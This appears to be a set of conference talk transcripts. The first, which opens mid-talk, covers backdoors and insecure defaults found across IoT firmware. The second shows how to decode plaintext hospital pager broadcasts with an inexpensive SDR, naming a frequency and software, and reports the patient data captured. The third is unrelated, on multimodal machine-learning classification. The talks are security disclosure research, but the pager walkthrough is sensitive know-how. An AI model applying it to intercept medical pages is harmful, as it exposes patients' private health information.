and in the change log, we see a GitHub reference there. And in there we have a Rust OpenSSL. And if you go in there and you look at these different things, you have these keywords of Rust, that's for the Rust language. So finding qualified platform, sorry, CPEs, can be a real challenge. The other thing that's a real challenge here is we don't know between CPEs what relates to each other. Because this Rust language depend on OpenSSL of a certain version, the CC++ version of the first line, to be a certain version, right? Does 092 map to 097 or 097A or 1.01? We don't have these kinds of interrelations. So not only is generating an S-bomb difficult, but developing a body of ground truth around an S-bomb is extremely difficult. And it's not a problem that you think of because you think it should be obvious, but who owns that? Is it the company's responsibility to add their platform to the CPE database so that vulnerabilities are found against it, that there's reliable data there? Or is it the CVEs who find the vulnerabilities? Is it their job to correctly find and identify the platforms if they're not there? So that's just a little background here on the CPE system. They're good systems to start off with, but we need more on top of that. We need some ground truth. We need some ways to relate this. By the way, there are some projects that are starting to put these together, but it's hard. Do you scrape the apt get repose for what components are in OpenSSL or HTTP servers? And HTTP servers rely on OpenSSL, which versions go with which? Well, if you're installing it, you know, because you look at the readme for the HTTP installer, right? And it'll tell you which versions you have, but we don't have any way of systematically obtaining any of that information. So let's go to a specific example of vulnerability and let's look at the supply chain here. We'll go with an old example. This is from four years ago. I'm not going to try to butcher Robert's last name, but Darkonius, he released a write-up on a router backdoor that he had discovered originating from a version of OpenWRT, an open source router operating system, from at that point was 10 years ago, was 10 years in the past. So there was this backdoor hash that's down in the pseudocode below, 1D, 680, whatever. If you entered in that on the command line, you immediately got a root show and you can see the relevant code there. The problem is, is this was just in an OpenWRT version that was 10 years old from, I guess, 2006, right? But the write-up that he had was this was not on an OpenWRT router. This was on a commercial router that had included OpenWRT and its libraries and were using components such as this component script called logon.sh as a part of their operating system. So Darkonius found the backdoor in one or two sets of devices. And if you read through the comments, different people were chiming in, oh, I just tested against this and I found it on this and this. So we found in the comments, three, four, maybe five models of devices listed, but how is Darkonius supposed to know and go out and find, is it his responsibility to go find every single device that this relates to? Is it even his obligation to go to the manufacturer of this device and tell him, hey, I found this in there? If you go and you look for this CVE, you don't find this CVE in the database. If you go even further to the CPE, the platform for this device that he looked for, you don't even find CPEs that are related to this specific device. And this is not a small device. This is a device that made its rounds and you can find it different places. So whose responsibility is it? In our dataset, when we've looked at all of our firmware just sitting around, we just did a string search for that magic hash. And lo and behold, we found 3,810 files that had this hash in it. And it wasn't just the hash, it was the full login script. But notice the file name, COI2, factoryboot.sh, login.sh. So the original login.sh was a part of the original package. But we found the actual login.sh encapsulated in a binary called a command line interface, a CLI, or even two that was used by web servers and stuff on IoT devices that still ran the same code from 2006 that nobody, I'm sure nobody knows, is in there. The manufacturer doesn't even know it's there anymore. And the thing is, is that three major vendor companies have this. 44 different product models and 281 versions of this firmware. So this open WRT login.sh, this hash, has made its way into many, many, many different vendors. This isn't just one person accidentally downloading it and putting it in. This is the supply chain of people taking from A who takes from X, who takes from Y, and it multiplies. So this is the heart of the problem. This is why we're in the bind that we're in is the supply chain. We'll do one more example before we get into the more juicy stuff, the statistics that we found. This latest CVE that we're talking about is Ripple 20. I'm sure you guys have heard of it. 19-0 day vulnerabilities amplified by the supply chain. Its title says it all. And this was two months ago that this was or so was reported. And according to their white paper on it, this affects hundreds of millions of devices or more, includes multiple remote code execution vulnerabilities. So that's the worst kind of vulnerability that you'd want to have. Many other major international vendors suspected of being vulnerable in medical transportation, industrial control systems, et cetera. So my previous example kind of laid the groundwork for how something like Ripple 20 exists. So let's just take one of the CVEs as an example that they reported. So this was published two months ago, June 17, 2020. The description of it, the Trekk TCP IP stack before this version allows remote code execution related to IPv4 tunneling. So this is a vulnerability. They said it's bad. There's a base score of 10 critical on here because the remote code execution and how easy it is to theoretically get access to this TCP IP stack. If we look at the CPE that is related to all CVEs, have all the CPEs that are related to them, we find these four Trekk versions are all rolled up underneath this Trekk stack CPE. The problem is, is when we look for this Trekk stack and we go back to or we click on the actual record in the CPE database, we find the quick info is that the CPE for this Trekk stack was created almost a month after the vulnerability was discovered. So there was no product for Trekk TCP. We had to invent, not we, but the vulnerability researchers had to invent the CPE that even belonged to the Trekk stack. And then we go back to our original problem. If you have this Trekk library and you're trying to figure out where all it's at in the world, you've got to kind of do some detective work. And they did some detective work because we don't have any CPE to CPE relationships. And even if we did, the CPE didn't even exist. Nobody even knew that Trekk TCP exists. So I kind of imagine reading through the paper about this. I almost imagine Luis from Ant-Man 2 when he's being interviewed, where is Scott? And I kind of imagine him talking about, hey, Luis, where is Trekk? And he goes, hey, man, see, that's complicated. See Trekk, there's some smart guys, but they need some help, right? So they go to Elmick Systems and they're like, hey, we need some developers. And Elmick Systems is like, yeah, we think you got it going on. So let's get together. And so they decided to work it together for some. But then something happened. And like, nah, homie, we're split. We're out of here. So Trekk goes off on their own way and Elmick Systems go off on their own way. And Trekk be like, we got the Trekk TCP IP stack. We're going to market all this in the United States. And Elmick Systems are like, no, homie, we're no longer in Elmick Systems. We're Zook and Elmick. And we got the Casago TCP IP. I know it sounds like yours, but it's better because it's been renamed. And you think you got USA and you think you're all hot? Hmm, homie. Dang, we got all of Asia that we're going through. Meanwhile, you got security researchers in the middle of the light going, hey, can you just tell me where Trekk is? And Trekk is like, hmm, see, it's complicated. And they go to Zook and Elmick and see, they're just like, like, where's this Casago at? And we can't even figure it out because their legal system is cutting us out. Whereas Trekk is back here going, let's see, I got an uncle's girlfriend, boyfriend who had a relative named HP. And it's kind of like the Rona virus, right? Like, where's the contact on this? Like tracing. And their uncle's second cousin once removed is named Aruba. And I think we were at a party to get, and meanwhile, Zook and Elmick is like, and Jsoft is just like, where is this? And Zook and Elmick and Trekk and all these people can't find out. And they're like, that's what I'm trying to say. It's complicated. Right? I'm sorry, I probably put you there. But I can imagine industrial control systems and industrial plants that have SIP 13 investigators or people coming in, I can see their first slide to the SIP 13 auditors are going to be this picture of Luis and two words, it's complicated. Right? Because it is trying to find out where this Trekk TCP stack was according to this paper, pretty nuts. Okay. So anyways, it was developed somewhere in the 90s to 2000. It was included in a large quantity of firmware for devices. There's been various patches to it. Some of the Ripple 20 CBEs that were even disclosed were patched and versions as far back as 2009. So you're a vendor, what products of yours contain this TCP IP stack? How do you know? How do you update a device when a patch is present or even know what version of the Trekk stack you used to have in your device? How serious is the threat to your device? Right? Maybe it's not that problematic. Maybe it was just included but never used. So reproducing CBEs are problematic. The actual attack vectors are really hard to classify in these individual products. You potentially waste time from vendors on trivial vulnerabilities that really aren't practical. So really the bottom line for vendors are how much money do you spend trying to find out whether you have to develop firmware patch for software that you don't even know is in your device or how likely is the software that it's even going to be exploitable. Right? So it's a hard, hard question. So I'll come back to the software build materials here in a little bit. But just for right now, let's make a little shift over into our database and let's look at some of the vulnerability statistics that we have here. Hopefully you guys find this enlightening. I certainly did. This is just kind of represents a slice of the industry. We have medical devices. We have information control systems gear. We have all sorts of different sectors represented and verticals in our data sector. So here we go. All right. So Etsy Resolve popular name servers 127001. Not surprising is one of the top ones. We got some Google addresses there, 8844. And then the next three down there that you see 168 are all Asian DNS's. And then you've got some strange noise in there, 192168. Someone.com, a couple others, corporate. So if you have all these devices and they're going to the US and they have Asian domain servers, you're going to have a performance hit or vice versa. How do you know where these products are going and which name servers are hitting? I saw some forum posts about 1921680.7. Maybe the people who made Resolve or this Etsy Resolve had it on test and they were just copy and pasting from a forum into this file. Someone.com, that actually was one vendor, but it's on a whole slew of firmware for all sorts of different products in their product line. So you can see not only is that illustrative that someone has just put that in as an example and they found that example somewhere, but it's in all their Etsy Resolve and they just copy and paste that file into all their other firmware. So where's the checks and balances on what's actually running in there? Even stuff like corp.ubnt.com, corp.ubnt.com doesn't exist, but it's running on a device as a Resolve. So if someone decides to turn up that host name and then start serving requests on there, you could have some interesting results. Here's another one, TTY count in Etsy secure TTY. So if you look at the bottom, Etsy secure TTY file allows you to specify which TTY devices a root user is allowed to log in on. So let's just make one thing clear. Once you have an IoT device in production, you probably shouldn't be logging into that device at all. All right. So most normal operation shouldn't allow anybody from the outside to ever be tunneling into that device remotely. Not a root user. So I want to highlight this 196148. So what that means is that these counts are the number of TTYs listed as approved TTYs that root can log into. So 1486 firmware have file has an Etsy secure TTY with 196 approved TTY locations for root to log in on. All right. So I tracked this one down because this file is just like, where is this anomaly from? I found a Yachto project, which is a way to programmatically or to easily generate a Linux operating system custom build for your project. And this particular file that I found was from 2013. So here is a supply chain. Someone who's building and wants a secure TTY, they pull down this file that's pretty permissive probably for development purposes and that really supposed to be for production. And yet here it makes its way into all these devices. So here's the supply chain in action. All right. Number of valid login shells. So this is an Etsy shell. This is the number of acceptable different types of shells that you can log in from. And most have one. So again, whether you should have a shell that people can log into or not, that's questionable, but at least a lot of them, majority of them, have only one. But then we have this 10 login shells. And I guess what they want by this, a little tongue in cheek, is if their hackers are coming in and are used to have all their key bindings in their environment files for bash, they want to make it easier for them. So they're just going to throw in bash in there. And if you're Ash or ZSH, we got you covered. You can log in however you want. Again, a little tongue in cheek, but that's what that number represents. An additional thing here that was kind of concerning is when I got delved into the actual types of devices at this source. There was over 60 of these or models of patient monitoring health systems. So over 60 different models, which represents however many thousands or hundreds of thousands of health systems, patient monitors that are sitting bedside have 10 or so login shells that somebody could log in with. These are just configuration examples in the supply chain. I'm not saying these are actual vulnerabilities. They're just interesting anomalies from the supply chain. So here's a question we'll configure. We're about out of time, so we're just going to go through these quick firmware where the root user has a login shell, 15,345. So 30% of all of our firmware that we looked at has some sort of login shell. Whereas if you don't want the root to log in, use SBIN login, guess how many? Over under one. We found one firmware that actually had SBIN no longer in it. Okay. Firmware with keys and authorized keys. Now this is a bad backdoor because this basically says if someone SSH is into your box, if your key matches their key in the authorized keys, you get to log in without any password. So this is a classic backdoor, whether it was purposefully put there or not, what's the over under? 175. 175 firmware. Remember, this is firmware, however many devices this represents. This is 12 different vendors with these keys. And over 29, these were really interesting known hosts to see where these came from and the different medical facilities and different places that had known hosts coming from them. Clam AV, only for firmware had any kind of an open antivirus software. Firmware running HTTPD with Mod Auto Index, so this auto index is a way to auto index files on your web browser or your web server when there isn't any kind of match for the HTML name. So it's a great way to kind of troll through your directories. So these are, again, things that are questionable that are in our configs. Firmware starting TTY and init tab. So quite a few firmware are starting TTY, but not that many distinct files. So here we're seeing amplification in the supply chain of here's 63 files, but these 63 files are found in 4,729 devices. Here's a particularly bad one. Firmware with PHP to default to display errors, 332 firmware. So using SQL injection or any kind of command injection, I love when developers leave on their display errors because when I made a mistake, it tells me exactly what's there. The problem is that PHP to by default allows display errors. You have to explicitly turn it off. So maybe we should be making software that doesn't have defaults that are vulnerable like this in their default configuration. All right, next part. Firmware with insecure default DES encryption. So if you don't specify the type of encryption for your passwords, you're going to use DES, which is a bit weaker. 318 firmware, 29 files. But even worse, there were firmware that specified the flag to turn on MD5 as their password crypt. It was 12 firmware. Fortunately, it's small, but they're still 12 firmware. Have no idea where those are at, but they're out there. Firmware with a master.password with no password on root. So in the password file, there is no over, under, on 100 devices, 10 devices, a million devices, not only seven, but still one file made its way in with no password on the root. MySQL binding to 00000. So listen to the world and allow people to go right to your MySQL, 26 devices. Firmware with Redis, the same way, default world bind. So if you don't specify a bind by default, it will allow you in three. It's only one file, but still three firmware allow you into their Redis by default. Average number of unsafe function calls per firmware. So this one is any unsafe function calls is stuff like stir copy, mem copy, all those unbounded ones like Ripple 20 found and stuff like malicious ways to use standard allocation functions without checking lengths and stuff like that. How many do you think in per firmware? 1500 and some average unsafe function calls per firmware. Okay. Number of firmware with unsafe function calls? 53,000. That's over 50%. And those are the ones that we've named. We haven't even trolled through those with function hashing and stuff to find the unlabeled ones that also call these. All right. Firmware, here's the last one. Firmware exporting NFS mounts to the world. All right. Over and around this one. 42. There are four files that contribute to 42 firmware mount to the world such as slash root, mount a star, read write. So you can as root write to root as user ID zero. So these are all questionable configs that have made it their way just fun things that I found trolling through. And finally, what it would have talked like this be without talking about the common passwords and all that. So you see here amplified here again is the supply chain where you have the file counts of all those are the light orange. And then the dark orange is actually how many firmware use those files in them. And the number one being admin, it's only in five files in the password file. But those five password files are found in 470 firmware, which may represent hundreds of thousands of devices where we've cracked the password admin. I'm going to give you 10 to one guess what the password is going to be for that admin user. All right. Anyways, in conclusion, it's all about the software bill of materials drive towards generating and validating these. This is the path for manufacturing's implementing software inventory systems being developers being diligent and reporting all the components used in their systems, consumers having a high demand or having a high standard in transparency and favorite companies and buying from companies with that info as well. These are the team makers who help guide these unified standards and reporting in formats and our security community here developing tools to assist in the automation of the inventory. If we're doing the same thing now in five years, we're going behind. We should be using machine learning. We should be using tools and other things to help us inventory and validate these things not just on the front and on the back end to validate patches and updates are what they say they are and they contain what they think they contain. Thanks to all my team at Fine State and a lot of good research that's been in the industry. Finally, obviously the question and answer on this session are going to the Discord, but I've had a fun time talking to you all. Peace out. Hope you enjoy the rest of DEF CON and IoT Village. Thank you so much for having me.
IoT device manufacturers have no idea what's running on their devices -- they really don't. In 2002 then-US Secretary of Defense, Donald Rumsfield, brought public attention to a notion that information can be divided into three categories: known knowns, known unknowns, and unknown unknowns. As hackers, how can we apply this formulation to IoT vulnerabilities? The known knowns: Vulnerabilities that have been explicitly discovered through scanning and testing. The known unknowns: Newly created software that has yet to undergo any application security testing. The unknown unknowns: Systems that the defender does not know about. There is, in fact, a fourth dimension: unknown knowns, which comprise “that which we intentionally refuse to acknowledge that we know” or “do not like to know.” The unknown knowns: Vulnerabilities that are known to exist, but that have not been associated with all the systems they actually affect. In this talk, we report on IoT device vulnerability findings at massive scale, as a result of our firmware collection and analysis. For this research we have selected approximately 50k firmware images, representing over 7M files, 10k products, and 150 vendors, spanning many different architectures and operating systems. We will highlight some of the trends we've uncovered in supply chain vulnerabilities, and reveal specific examples of device backdoors, botnets, and vulnerabilities discovered in medical, home, and commercial device firmware.
10.5446/50736 (DOI)
Hey everyone, welcome to my talk, Pandemic and plain text. My name is Troy, aka Waveguide on Twitter. I'm an RF engineer in the aerospace industry. I was formerly a security engineer in the access, control and lock industry for a number of years. I also host the channel over at hackerwarehouse.tv and I just wanted to give a special thanks to IoT Village and to Defcon Safe Mode for hosting this talk and to my friend Voxel for this really cool setup and background. So let's get started, Pandemic and plain text. All right, the purpose of this talk, and I want to be really clear, is to stop the use of insecure communications in hospitals by shining light on the use of insecure wireless communications that are accidentally leaking your health data and violating your privacy laws. I'm not here to bash hospitals, I'm not here to bash the medical industry. I just want to bring to light that there is this leak happening and it's been happening for 20 years and right now in the middle of this pandemic, I think it's really important that we pay attention to this and that we fix this problem. And just to note that none of your healthcare providers are really doing this intentionally. This appears to be accidentally that they're leaking your information and they just don't know it. And if you don't want to watch the rest of this talk, the TLDR is, hey, your COVID test results are being literally broadcast for mountains. Yeah, so the story behind this is if you go back to November or December, a lot of us were looking at Twitter and watching this pandemic come across China. And we were really asking ourselves these questions, like, is this real? Is this going to come over here? Then it kind of came across the ocean and we got to ask these questions about, you know, do we have enough beds and PPE and any cries for help and are they going to be shortages? And I just started having all these questions and I really was looking for data on this stuff. And like most of the people, it's kind of hard to sift through all the incoming data that we get through the news. And I just really wanted the hard data. And you know, I wanted to know, is it affecting my community? And if I could see the data, then I would be able to answer these questions. And I remembered that I think I knew an answer to these questions using RF and wireless. And that was through something called PogSag, which is pagers. I remember a couple of years ago, we did a talk on Hacker Warehouse TV, not really a talk, but we did a show about how to decode pager messages that are freely being broadcasted in the air. And when we did that, we saw a lot of things that were medical related. And I thought, well, maybe it's a good time to revisit that and see what we can find and see if any of these questions could be answered with data over the PogSag network. All right, well, just a little legal disclaimer for this talk. I'm not a lawyer, but I think the following is true. Possessing a software defined radio. Yeah, that's totally legal. Define radio operators do that across the globe, receiving 900 megahertz signals on those SDRs. Yeah, of course, that's legal. Listening to audio on those signals, just like voice or tones. Yep, nothing special there. Decoding the audio of those signals. Well, that depends. Are they encrypted? In this particular case for this talk, no, not even a little bit. This is all plain text tones, and we're just decoding them. That is legal. Decoding secure messages or anything that's encrypted. That is not legal. And in this particular case, nothing was decrypted. Distributing or sharing patient information. Obviously, that is not legal. Don't distribute any personal information or any sensitive information that you may receive over these plain text broadcasts. But for the hospitals that are broadcasting the patient information from a mountain top antenna, apparently that's perfectly legal. I don't know. Maybe that's just a hip of violation. Again, I'm not a lawyer, but let's continue. All right. Is this a new vulnerability? The answer, unfortunately, is no. I'm not, unfortunately, dropping zero days here. This has been around for quite some time. I think it was DEF CON 5. This was brought up back in 2016. There was also the Holy Pager artwork, I believe it was in Chicago, where it would intercept all PogSag pager messages and it would form them randomly to one of three pagers on display. And then it would print out a continuous roll of receipt paper, making a big pile of personal information that they automatically redacted. So that was pretty cool. Then back in 2018, this was brought up again. It was kind of localized to five or six hospitals. It's digging into that case and it seemed that the response was that intercepting or decoding these tones was a sophisticated attack. I think you'll see at the end of this talk that that is not the case at all. All right. Where to begin? In order to do this, you have to get some gear. Back in 1997, I would have agreed that it's a sophisticated attack, but not today. Back then, you'd have to get a scanner. You'd have to modify it with something from loft heavy industries like this PogSag decoder from back in the day. I think that thing was 60 bucks. Then you would go over to this Dr. Who's radio phone site, which I used to frequent quite often when I was a teenager. And then you would have to stuff all that back into the scanner and then you could decode these tones. And so, yes, back in 1997, that was a sophisticated attack. However, in 2020, you just have to buy a $20 SDR and you can get those from Hacker Warehouse. You can get them off Amazon, off eBay. It's really just too easy now. You really just plug in the SDR, download some software, and then you tune to the signal. It's almost as easy as getting in your car and tuning in a frequency on your radio. You pick one of these frequencies here. These have been around for 20 years. The pager networks really haven't changed. And you tune into them and you're going to hear some tones. Now the frequency used for this talk was 929.596. I localized the signal. It's coming from Santiago Peak, the antenna farm up there. And it has a lot of coverage. I was picking up hospitals from about a 70 mile radius. So a lot of stuff from Riverside, Pomona, down San Diego area, Irvine, not so much from LA County. But everything you see there in the circle was definitely within range of this tower. And the way the towers work is they relay off of one another. So a lot of times, if you're not close to this tower, you'll be close to another tower. And you can find a signal that way. These signals are very strong. They're probably when you plug in the software and you tune to a station, they are the strongest stations around. OK, so as far as the signal goes, it sounds a little something like this. This is provided by MNXR. They said they got it from Matt Damon. I'm not sure if that's true. But it sounds like kind of like an old modem tone, right? So that's what you're listening for. So when you tune to that 929 frequency, you're going to hear a whole lot of that. OK, so the audio tone you just heard basically is a little more advanced than like a DTMF tones on a keypad. So like whenever you press 1 on your telephone, you get a combination of this 1209 hertz and this 697 hertz. And that's how the system knows that's a 1. Similarly, frequency shift keying, whenever you lock onto that 929 megahertz signal, those audio shifts you hear are creating ones and zeros in the bit stream. And that's kind of in a nutshell how FSK works. Remember, I'm watering this down for kind of all audiences. But the point is the tones will create the frequency shift keying, which then creates data. And a Windows program like PDW will decode that data and it'll just put it across your screen like this. And so this is actually what you just heard decoded. It's the standard DEF CON, drink all the booze, hack all the things, mantra. So that's how this works. It's really not encrypted. It's all plain text. It's just a little bit more advanced than DTMF tones on a telephone and you tune into the tones and you get the data on your screen. It's really that simple. So now that you know how it works and how to decode a dual course song, let's shift back to kind of the hospital research. So I did a little digging here. There was this research about use of technology for patient care related communications. The gist of that paper was that 80% of hospitals still use pagers and in that paper they actually believe that pagers are more secure than cell phones. And you can check out this link and read more about that. But the quote that stood out to me was this one. They send only numeric messages or basic test messages, says Dr. So-and-so. This way no confidential information can get in the wrong hands. That's could happen with a cell phone. And I think that is the heart of this problem. Pagers are actually thought of as a very good tool and a secure tool to use in hospitals when in fact they're not. So if we kind of know that, then it kind of makes sense why all a hip of compliance is being put into the network and securing the network within the hospital and the pager usage is not really thought of as an open door. It's thought of more secure than that network. And what I found was that the pager usage actually isn't. So if we go back to that quote of they send only numeric messages, basic text messages, and no confidential information can get in the wrong hands, it's actually quite different. So here we go. This is a basic pager message from a hospital. It's leaking your personal information and it even includes COVID results. This is one dissected. So I'll walk through this. You have the pager number followed by the message time it was sent, the message date time, flex A which is a type of PogSack related protocol, alpha which kind of defines the type of flex. There's different types. It includes this automated system name which I'll touch on in a bit. It has the hospital name. It then goes into requested which this is a bed request, last name, first name, age, gender, isolation protocol that kind of tells the PPE. There's droplet which is like a face mask. Sometimes it says full PPE. Sometimes it says face. Different things there. The origin unit, sometimes it says doctor's name. Sometimes it says a unit. In this case, it was the emergency department or usually that's emergency something. Sometimes it's a full doctor's name. And then in the comments right there, it says COVID positive or COVID negative. So that is a basic pager message that is not supposed to have any of your personal information in it. Because of COVID, they have gotten quite bloated with personal information. It didn't used to be this big. And that is the point of this discussion is this is what a simple text message looks like now and it has too much personal information in it and it has a lot of privacy violations in it as well. So once I saw that, I mean, what did I do? I decided just to let that decoder run. So I ran it for 52 days mid-March through August 1st, 2020. Looking at COVID related results, they would come across the screen. It resulted in 52 files. Only 28 megabytes worth of data. And remember what I was looking for in the beginning? I was trying to figure out, hey, is this pandemic real? I didn't know anybody that had it. I didn't know if it was in our hospitals. So I really just wanted to trust the data and see for myself. I was really concerned about this whole, do we have enough beds, PPE and shortages? Wondered if there was data that would support that or give me a number. I wanted to know if it's affecting my community and I wanted to know, is anybody out there doing this right and sending these messages securely? And so I got answers to all of these, really. This is what a basic pager text message looks like and here's some of the information we got. So hospital bed requests, they include COVID results. You can see over here, COVID positive, COVID positive. They came from a couple different systems. This one came from an XT system. This one over here is this RTM system at now. So you can see here, I've redacted all the information so I'm not distributing personal information here. This is a generic Patricia. She's 84-year-old female. She has COVID positive and this one is a 45-year-old male, Zaro. He has been diagnosed with COVID-19. Additional comments they even put in here. This is what is known, COVID is known as, is acute hypoxic respiratory failure. You see this pretty readily come across the stream. You see MS Fire runs, which give you a little more data on things that are happening then and now outside the hospital. This particular instance, someone was brought in because they smoked weed and drank some shots but they asked them about COVID and they were negative on the COVID questions. So that comes across the stream. You get a lot of nurse to doctor communications going on over the pages. You got ICU admissions. You can find out details there. They're broadcasting. This person was intubated on three pressers. They even questions on, they want to discuss options with hydroxychloroquine and ribavirin and then they have phone numbers there. There's a lot of questions going back and forth. You also see these nurse to doctor communications regarding ventilator data. Basically everything they talk about on the news is being broadcast through these pager messages in plain text. There's a lot of this coming across the stream. Over 52 days, there were 17,286 tones decoded that turned into these types of text messages. Of those, 1,852 were bed requests with that HIPAA information included that should not have been there. There were 2,077 diagnoses. Of those diagnoses, 1,219 were COVID related. That includes negatives and positives or even questions, COVID questions. I just put these on here for comparison. There were only 78 fracture related. Surprisingly, only 67 cancer related and 300 chest pain. So you see an uptick in chest pains with COVID. So that was one of the filters also in the data. Average of patients with the virus was about 72 within that tower. Like I said, there's towers across the United States everywhere that are broadcasting this. So it will vary from place to place. Also I did get an answer to that final question. Is anyone doing it secure? I found that a few, I think it was 11% of the messages actually were sent securely. Obviously, there's a lot of attack vectors with this kind of information from embarrassment to identity theft, to billing scams, disrupting supply chains, misrouting patients. That would be if you were spoofing communications. We are not doing that here. We're just receiving these things out of the thin air. But there's a lot of like drug interaction text messages where it says, hey, should they take this, text me yes or no. And that seems dangerous, especially over unencrypted communications, which leads just to life safety in general. And that's why this practice of using pages in hospitals just really needs to stop. So how does this happen? It appears that no one's doing this intentionally. It's part of a system. That XT system is there's a lot of these different patient management systems that hospitals use. This one looked like it came from teletracking XT, which they talk about IVRs, which are systems that help hospitals manage patients, and even in here in the teletracking website they talk about details are sent to the employee's pager. Keep in mind that's not their fault. This is just their software. You can implement these pager communication systems properly with encryption like we saw back here. See this one was secure. But it's really up to the hospital and their service providers. It may not even be the hospital's fault. They may contract it out to a telecommunication service provider and they're just using the wrong type of pager network rather than the secure one. So also found though that these systems are tracking this exact same data and they're providing it back to the hospital kind of on an enterprise level. So that the heart of the data is the pager data. And then you can create these dashboards. And so they're actually doing what I was trying to do, but they're doing it within the hospital. And you can see it's very valuable information for the hospitals, but it just needs to stay within the hospital, right? So what answers did I get? Yes, this is real. It's happening. I saw EMS run confirmations. The symptoms match. We can see most bed requests seem like bed levels were okay. Didn't see a lot of messages where people were worried about that, but that was just my area. I'm sure that's a problem other places. I was able to see in my community that the older population was more affected. And I also was able to answer the question of is there a lot of security here? And it was not. Only 11% of the messages were actually secured and encrypted. And in no way did I try to decrypt them at all. That would have just been too hard when you have thousands of thousands of them that are not encrypted. So where do we go from here? Healthcare providers need to do this stuff. And I've been in the industry. So these are the questions that some of these roles need to ask. I won't go through all these, but CIO needs to allocate budget. IT needs to ask some questions. Auditors start auditing these pager networks, please. Lawyers start asking questions. Reporters spread this information in this talk so we can have these conversations about healthcare system. And patients, you can ask your providers about their pager system security if you see your doctor wearing one. CIOs just need to listen to the security community. Please don't say this is a sophisticated attack because it's not at all. It's super easy. We just need to upgrade the security in these systems. And for the healthcare providers, they just need to keep up the good fight. Let IT deal with this. And keep doing what you're doing because we're all thankful for everything that you do. All right. Thank you. I think my time is up. Thanks again, everybody, for listening. If you want to hit me up on Twitter, you can reach me at waveguide. We're on the Discord link right here. I'll be doing Q&A right now. So talk to you soon and hopefully see you next year. Thanks.
When a wireless engineer decides to tune into hospitals to determine the state of COVID in the community, he finds detailed patient info being broadcast into thin air. By capturing, decoding, and analyzing the info, the true state of the pandemic is realized.
10.5446/50456 (DOI)
because it's in the multimodal area. And it's a co-work with Shaman, Orishi, Jens and Maria, all from the University of Bonn, my colleagues. And specifically, what we focused on here is a multimodal classification. And multiple objectives and how we use those is the contribution. So what I'll do in the presentation is I'll just go through multimodal classification, introduce the task. Then we'll talk a little bit about what the main challenge is that we've found in this particular area. Then we talk about our approach and how we tackle this problem. And then we'll look at some results and a conclusion. So multimodal classification, what is it? Very simply put, very simple. So that's where you have a classification problem, where your inputs are in more than one modality. So very typical image and text because a lot of web data tends to come with these two modalities. So you have lots of different bimodal multimodal classification tasks out there, such as, for example, source detection of news articles. So imagining of Washington Post and I don't know, the Guardian and six other, seven other news sources. You can classify the articles based upon the types of images and the tone of the articles based to teach one of those sources. You can also do event detection. So that's a typical example. You may have events such as protest marches or sports events. And then again, you take your articles or whatever items you have and you classify them along those criteria. So the specific task that we're looking at in this paper is built upon IMDb. So it's movies. And what they did is they took the typical movie plots that you have an IMDb and they added posters along with those movies. So on the right hand side in the bottom, you have an example here. We have a movie called Blaise Pascal. I haven't seen the movie, but the topic sounds very interesting. The plot here is actually fairly short, but some of the summary is much longer than this. And then you have two genres, which will be the classes, in this case, biography and history. Important is two genres, because what we're talking about here is specifically multi-label classification. So we have 23 of these different classes. And what's important to stress is that can have a title which has more than one label. So something can be, for example, a black and white and a drama. And in this case, it can be both biography and history. So it's multi-label classification. Typical pipeline for multi-modal classification is just mapped out at the top of this slide. And so very typical kind of framework that we deal with. So we have, in this case, image and text inputs. You make some embeddings. Then typically you have some sort of way of combining your modalities. So in this case, the baseline model we took used a multi-modal fusion process. And then you have some sort of classification going on based upon those fused inputs. Now, what's the key challenge is, is that when training on multi-modal data, you tend to have a very high number of parameters in systems. And this very easily leads to overfitting in models. So what we did is we took the baseline system, which is based upon that top figure. And we included some regularization methods, in this case batch norm and max norm, which reduce variance within the system. And we excluded those methods to see the impact that regularization has on this system. As you can see, it's quite dramatic. So these are the validation curves. And the validation curve without regularization, it already starts to trail off at about Epic 7. So regularization is a major, major challenge within multi-modal machine learning. So now I'll move on to our particular approach to tackling this problem. So first of all, just going back to this pipeline, the baseline system, this is fairly typical in that you have one loss function or objective to train the whole of the system. In this case, binary cross entropy, which is a standard loss function for multi-modal classification. What we decided, first of all, is to introduce two different loss functions. So first of all, within the multi-modal fusion part of the process, we introduce one loss function, and then we stick with binary cross entropy loss function for the classification part of the pipeline. So what's interesting here is that the particular method or loss that we introduced into the first multi-modal fusion part of the pipeline is called elbow. And that's an instance of variational inference, which is a technique which is very common in probabilistic machine learning. And what's unusual here is you don't tend to get systems which combined by the probabilistic machine learning approaches with deterministic machine learning. It has happened, but it's fairly unusual. And specifically when you're training simultaneously, the whole of the system, this is very, very unusual indeed. In fact, we couldn't find an example of multi-modal classification being done in this way. And so what you do with probabilistic machine learning is that you turn your, in this case, the weights and biases of your layers into distribution. So as opposed to having just like one number or point estimate as it's termed for your particular weight, you make a distribution of that. And then you can sample from that distribution. In this case, we chose Laplace distributions, which are particularly good for highly heterogeneous data. Because remember what we're dealing here with is text and images, which are very different from each other. And then simply variational inference, you apply the evidence of a lower bound or elbow as it's termed, which is the most typical loss function. And that's, if you imagine it, you have two distributions and you're just minimizing the divergence between those distributions, minimizing the KL divergence with gradient descent. That's just a standard kind of setup. Now, why we chose this is because we'd observed with these probabilistic methods and the loss functions that you could include all kinds of controls to calibrate how the learning was being done and therefore have much better control over reducing the kind of variance that we saw in this particular chart. So it gives you lots of different ways to kind of like, to take control of that. So we built three different versions of the elbow loss to account for different types of regularization process. So we took the standard elbow, which there you're basically maximizing the evidence of a lower bound. That's elbow V1. Elbow V2 includes a strategy called row black realization, which I'm fortunate got time to go into. So basically you introduce some conditional expectations instead of random variables. And then finally, we have one other method, which is KL annealing, which is quite similar to learning rates annealing, if you've ever done that, where you start off with a very high learning rate, for example, you may decrease that as you go through the learning process. Same here, KL divergence within the setup has a kind of a regularizing effect upon learning. So actually what you can do is you can reduce or increase the impact of that KL divergence as you go through the process. And thereby introduce a high level of regularization to minimize that variance. So the results, first of all, on the far left, we have the result for our top model. And in this case, it's using that KL annealing process combined with standard L2 regularization method. And the advantage is that when you combine these two different methods, you can then train with, for example, much wider layers. You can introduce lots more parameters because you've kind of had a lot more control over that variance that happens in the system. And so the F1 score for that was 0.617 versus the standard baseline system 0.608. On the right, what we've done is we've just taken our best model and trained it with the standard layers, 1024. And so there you can see what our system is allowing us to do is precisely to introduce more parameters into the system. And that's where the advantage is coming. So we're controlling variance in a much better way. Now you'll notice very quickly that there's not much difference in these scores. So this is the mean over five complete cycles of training and testing. So we dealt with this challenge of high variance that happens in multimodal networks, multimodal machine learning. Our contributions were to introduce that second objective, to have a multi-objective framework with one part of it learning the multimodal fusion process with variation inference. Then we used methods within that framework as to regularize or reduce variance. So we could have much better control of the parameters. And then finally, we put this all together into a single architecture within PyTorch. So just adapting that framework 